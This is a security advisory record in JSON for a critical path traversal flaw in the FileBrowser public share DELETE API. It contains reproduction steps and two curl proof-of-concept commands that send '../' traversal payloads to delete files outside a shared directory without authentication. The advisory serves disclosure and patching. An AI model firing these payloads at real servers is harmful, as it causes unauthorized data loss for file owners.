{"id":"GHSA-fwj3-42wh-8673","summary":"FileBrowser Public Share DELETE API Path Traversal Allows Unauthenticated Arbitrary File Deletion","details":"### **Summary**\n\nAttacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner’s configured storage scope.\n\n### **Affected Components**\n\n**Two distinct vulnerable code paths:**\n\n1. Stable versions (e.g., gtstef/filebrowser:stable)\n`DELETE /public/api/resources?hash=\u003chash\u003e&path=../victim`\nRoot cause: middleware.go:111\nIssue: path query parameter is joined before SanitizeUserPath()\n2. Development / HEAD (e.g., commit eabdfd9)\n`DELETE /public/api/resources/bulk?hash=\u003chash\u003e`\nBody: [{\"path\":\"../victim\"}]\nRoot cause: resource.go:274\nIssue: item.Path is joined before SanitizeUserPath()\n\n### **Steps to reproduce (Stable Version)**\n\n**1. Create a directory structure:**\n\n```\n/folder/shared_subdir/   (shared)\n/folder/protected.txt    (outside shared directory)\n```\n\n**2. Create a public share:**\n```\nPath: /shared_subdir\nAllowDelete=true\n```\n\n**3. Send request:**\n\n```\ncurl -X DELETE \"http://localhost/public/api/resources?hash=\u003cHASH\u003e&path=../protected.txt\"\n\n#Observe:\n#protected.txt is deleted despite being outside the shared directory\n```\n\n### **Proof of Concept (HEAD / bulk endpoint)**\n\n```\ncurl -X DELETE \"http://localhost/public/api/resources/bulk?hash=\u003cHASH\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '[{\"path\":\"../protected.txt\"}]'\n```\n\n### **Alternative PoC Scripts:**\n[poc_v3.sh](https://github.com/user-attachments/files/26159404/poc_v3.sh) (**If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.**)\n\n\n### **Impact**\nAn unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner’s storage scope. This results in unauthorized data loss and potential service disruption.","aliases":["CVE-2026-44542","GO-2026-5383"],"modified":"2026-06-25T19:56:36.833122048Z","published":"2026-05-07T03:28:06Z","database_specific":{"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-05-07T03:28:06Z","nvd_published_at":"2026-05-14T18:16:50Z","cwe_ids":["CWE-22"]},"references":[{"type":"WEB","url":"https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-fwj3-42wh-8673"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44542"},{"type":"WEB","url":"https://github.com/gtsteffaniak/filebrowser/commit/112740bdd41de7d5eb01e13ba49d406bfc463f69"},{"type":"PACKAGE","url":"https://github.com/gtsteffaniak/filebrowser"}],"affected":[{"package":{"name":"github.com/gtsteffaniak/filebrowser","ecosystem":"Go","purl":"pkg:golang/github.com/gtsteffaniak/filebrowser"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.0.0-20260501183844-112740bdd41d"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fwj3-42wh-8673/GHSA-fwj3-42wh-8673.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}]}